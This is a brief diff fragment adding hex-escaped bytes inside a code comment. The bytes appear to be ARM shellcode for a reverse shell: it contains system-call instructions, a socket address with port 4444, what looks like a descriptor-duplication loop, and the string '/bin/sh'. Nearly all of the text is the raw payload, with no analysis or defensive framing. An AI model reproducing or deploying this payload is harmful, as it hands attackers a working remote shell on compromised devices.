+        \x70\x4a\x71\x8a\x71\x10\x22\x02\x37\x01\xdf\x02\xb4\x69\x46\x04\x22\x03\x27\x50\x46\x01\xdf\x0b\x4b
+        \x0c\x68\x63\x40\xf9\xd1\x02\x21\x3f\x27\x50\x46\x01\xdf\x01\x39\xfb\xd5\x04\xa0\x52\x40\x49\x40\xc2
+        \x71\x0b\x27\x01\xdf\x02\xff\x11\x5c\x7f\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x3f\x53\x35\x39\x21
+
+*/